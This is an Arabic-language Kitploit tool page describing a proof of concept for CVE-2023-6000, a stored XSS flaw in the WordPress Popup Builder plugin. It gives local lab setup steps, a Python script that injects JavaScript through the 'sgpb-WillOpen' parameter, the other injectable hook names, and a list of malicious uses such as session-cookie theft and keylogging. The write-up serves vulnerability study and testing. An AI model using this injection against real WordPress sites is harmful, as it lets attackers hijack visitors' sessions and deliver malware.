Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-6000-POC — يكشف هذا الثغر عن خلل XSS في إضافة منبثقة لـ WordPress، مما يسمح للمهاجمين بحقن JavaScript ضار من خلال XSS مخزّن. | Kitploit
أدوات/GitHubGitHub/ronf98/cve-2023-6000-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراقتطوير الحمولات
GitHubronf98/cve-2023-6000-poc

CVE-2023-6000-POC

يكشف هذا الثغر عن خلل XSS في إضافة منبثقة لـ WordPress، مما يسمح للمهاجمين بحقن JavaScript ضار من خلال XSS مخزّن.

عرض المستودع
11منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

تفاصيل عامة

  • معرف CVE : CVE-2023-6000
  • درجة CVSS : 6.1
  • النوع : XSS مخزن
  • الإصدار المُصلح : Popup Builder 4.2.3

تتيح هذه الثغرة للمهاجم استغلال خلل في البرمجة النصية عبر المواقع (XSS) في إضافة Popup Builder لووردبريس. تفشل الإضافة في منع الزوار العاديين من تعديل النوافذ المنبثقة الموجودة، ومن خلال إرسال طلب مُصمم خصيصًا إلى الخادم، يمكن للمهاجم حقن نصوص برمجية ضارة في النافذة المنبثقة، والتي سيتم تنفيذها عندما يتفاعل المستخدمون مع النافذة.

في هذا الإثبات العملي (POC)، سيتم تفعيل الثغرة عن طريق التلاعب بسلوك فتح النافذة المنبثقة، حيث سيتم حقن نص برمجي بسيط لعرض تنبيه (alert) ليتم تشغيله عند فتح النافذة. يمكن أن يؤدي هذا النوع من الهجمات إلى مجموعة من المشكلات، بما في ذلك الوصول غير المصرح به إلى المعلومات الحساسة والمزيد من استغلال الموقع المتأثر، مما قد يعرض بيانات المستخدم أو الموقع بأكمله للخطر.

إعداد بيئة الإثبات العملي

  1. تنزيل XAMPP لاستضافة خادم الويب المحلي (أحدث إصدار)
  2. إنشاء قاعدة بيانات SQL
  3. تثبيت ووردبريس (أحدث إصدار)
  4. الدخول إلى لوحة تحكم ووردبريس وتثبيت إصدار ضعيف من Popup Builder (<4.2.3)
  5. إعداد صفحة أمامية بسيطة ونافذة منبثقة لعرض الثغرة

الخطوة 1: XAMPP

لهذا الإثبات العملي يمكننا استخدام جهاز يعمل بنظام Windows 10 وتنزيل XAMPP : https://www.apachefriends.org/download.html
بعد التثبيت، تأكد من تشغيل وحدات Apache وMySQL:

image

الخطوة 2: قاعدة بيانات SQL

يتطلب ووردبريس، مثل معظم أنظمة إدارة المحتوى، قاعدة بيانات لتخزين جميع بياناته الأساسية. قاعدة بيانات SQL التي سننشئها تعمل كوحدة تخزين مركزية لكل هذه المعلومات.

  • في متصفحك، انتقل إلى http://localhost/phpmyadmin
  • اذهب إلى علامة التبويب "قواعد البيانات" وأنشئ قاعدة بيانات جديدة (مثل wordpress_db).
  • دوّن اسم قاعدة البيانات لأنك ستحتاجه أثناء إعداد ووردبريس.

الخطوة 3: ووردبريس

  • قم بتنزيل ووردبريس من الموقع الرسمي - https://wordpress.org/download/
  • بعد التنزيل، قم باستخراج ملف ووردبريس المضغوط إلى مجلد دليل تثبيت XAMPP تحت C:\xampp\htdocs\
  • بعد ذلك، انتقل إلى http://localhost/wordpress وستظهر لك شاشة التثبيت.
  • في حقل اسم قاعدة البيانات، أدخل اسم قاعدة بيانات SQL التي أنشأناها، واترك الباقي كما هو افتراضي (المستخدم: root، كلمة المرور: فارغة (الافتراضي لـ XAMPP)).
  • إذا كان الاتصال بقاعدة البيانات ناجحًا، يمكنك بعد ذلك إعداد مستخدم مسؤول للوصول لاحقًا.

الخطوة 4: Popup Builder

يمكن تنزيل الإصدار الضعيف من إضافة Popup Builder من موقعهم الرئيسي: https://wordpress.org/plugins/popup-builder/advanced/
اختر إصدارًا أقدم من الإصلاح في 4.2.3:
image
بعد ذلك، اذهب إلى صفحة ووردبريس الإدارية - http://localhost/wordpress/wp-login.php
الإضافات -> إضافة إضافة جديدة -> رفع إضافة -> اختر ملف .ZIP الذي تم تنزيله وقم بالتثبيت

الخطوة 5: الصفحة الأمامية والنافذة المنبثقة

في صفحة إدارة ووردبريس، يمكننا إنشاء صفحة أمامية بسيطة بالذهاب إلى الصفحات -> إضافة صفحة جديدة -> اختيار نموذج.
بالنسبة للنافذة المنبثقة، اذهب إلى Popup Builder -> إضافة جديد -> اختيار النوع وتخصيصه.
لهذا الإثبات العملي، اخترت نافذة اشتراك، حيث أنها واحدة من أكثر النوافذ المنبثقة شيوعًا على المواقع اليوم.
image

في علامة تبويب قواعد العرض (Display Rules)، يمكنك إرفاق النافذة المنبثقة بصفحتك الأمامية:
image

الآن عندما ندخل صفحتنا الأمامية باستخدام http://localhost/wordpress/
يمكننا رؤية نافذتنا المنبثقة وهي تظهر.

الاستغلال

لتنفيذ الاستغلال، نحتاج أولاً إلى تحديد معرف النافذة المنبثقة (Popup ID).
يمكن القيام بذلك بالانتقال إلى الموقع، وتفعيل النافذة المنبثقة، وفتح علامة تبويب الشبكة (Network) في أدوات المطورين.
ابحث عن طلب admin-ajax.php، وهو مكون أساسي في ووردبريس يستخدم لمعالجة طلبات AJAX.
يستفيد Popup Builder من هذا لإدارة وظائف مثل الحفظ والتحديث والمعاينة والتحكم في النوافذ المنبثقة داخل ووردبريس.

ضمن علامة تبويب الحمولة (Payload)، يمكننا العثور على معرف النافذة المنبثقة:

image

بعد العثور على معرف النافذة المنبثقة، يمكننا استخدام البرنامج النصي التالي لتفعيل الاستغلال:

root@kitploit:~
import requests

# Define the target URL for the vulnerable site
url = "http://localhost/wordpress/"
headers = {
    "Content-Type": "application/x-www-form-urlencoded"
    }
data = {
    "sgpb-is-preview": "1",
    "post_ID": "22",     #use the Popup ID we found
    "sgpb-type": "html",
    "sgpb-WillOpen": "alert('Stored XSS Executed Successfully');"     #custom JS code goes here
    }

# Send the POST request and output the results
response = requests.post(url, data=data)
print(response.text)

خيارات إضافية

بما أننا نستطيع تعديل النافذة المنبثقة، يمكننا أيضًا التحكم في توقيت تشغيل JavaScript المخصص لدينا. إذا ذهبنا إلى صفحة إدارة ووردبريس، في إعدادات النافذة المنبثقة يمكننا رؤية خيار "Custom JS or CSS" (JavaScript أو CSS مخصص)، وهذا سيتحكم في توقيت الكود المخصص:

  • "sgpb-ShouldOpen": يتم تنفيذه قبل أن تبدأ النافذة المنبثقة في الفتح، للتحقق مما إذا كان يجب فتحها.
  • "sgpb-WillOpen": يتم تشغيله قبل فتح النافذة المنبثقة مباشرة، مما يسمح بإجراءات في اللحظة الأخيرة.
  • "sgpb-DidOpen": يتم تنفيذه بعد أن تفتح النافذة المنبثقة بالكامل، وهو مثالي لإجراءات ما بعد التحميل (مثل XSS).
  • "sgpb-ShouldClose": عمليات التحقق أو الإجراءات التي يتم تشغيلها قبل أن تبدأ النافذة بالإغلاق.
  • "sgpb-WillClose": يتم تشغيله قبل إغلاق النافذة مباشرة، مما يسمح بإجراء التغييرات النهائية.
  • "sgpb-DidClose": يتم تنفيذه فور إغلاق النافذة المنبثقة بالكامل.

image

يمكننا بعد ذلك دمج هذا في البرنامج النصي الخاص بنا وفقًا للاستخدام المطلوب.

التنفيذ

بعد تشغيل البرنامج النصي، يمكننا رؤية في صفحة إدارة ووردبريس أنه تمت إضافة سطر جديد إلى قسم JavaScript المخصص في نافذتنا المنبثقة:

image

الآن عند دخول الموقع كمستخدم عادي، يمكننا رؤية الرسالة التالية تظهر (prompt):

image

يمكننا أيضًا رؤية أن رسالتنا قد تم حفظها داخل قاعدة بيانات SQL (تحت جدول wp_postmeta افتراضيًا) مما يؤكد أنها XSS مخزنة:

image

الاستخدامات المحتملة

تسمح ثغرة XSS المخزنة هذه في إضافة Popup Builder للمهاجم بتضمين JavaScript ضارة يمكن تنفيذها كلما تفاعل مستخدم مع النافذة المنبثقة المصابة. فيما يلي طرق لاستغلالها بشكل ضار:

  • اختطاف الجلسة: يمكن لـ JavaScript الضارة سرقة ملفات تعريف ارتباط الجلسة وإرسالها إلى نطاق خارجي، مما يسمح للمهاجمين بالاستيلاء على حسابات المستخدمين.
  • إعادة التوجيه: يمكن للنص البرمجي إعادة توجيه المستخدمين إلى صفحات تسجيل دخول مزيفة أو مواقع ضارة أخرى (يمكن القيام بذلك عن طريق إضافة كود JS التالي: window.location.href = 'https://facebook.com')
  • التنزيلات بدون علم المستخدم (Drive-by Downloads): يمكن للمهاجم تشغيل تنزيلات لملفات ضارة، مما يتسبب في تثبيت المستخدمين للبرامج الضارة دون علمهم.
  • التشويه والمعلومات المضللة: يمكن للنصوص البرمجية المحقونة التلاعب بمحتوى الصفحة، مما يشوه الموقع أو يعرض معلومات خاطئة للمستخدمين.
  • مسجل ضغطات المفاتيح (Keylogger): يمكن استخدام نصوص ضارة لتسجيل ضغطات مفاتيح المستخدمين، والتقاط البيانات الحساسة والمعلومات الشخصية، ثم إرسالها إلى نطاق المهاجم.
تنزيل الأداة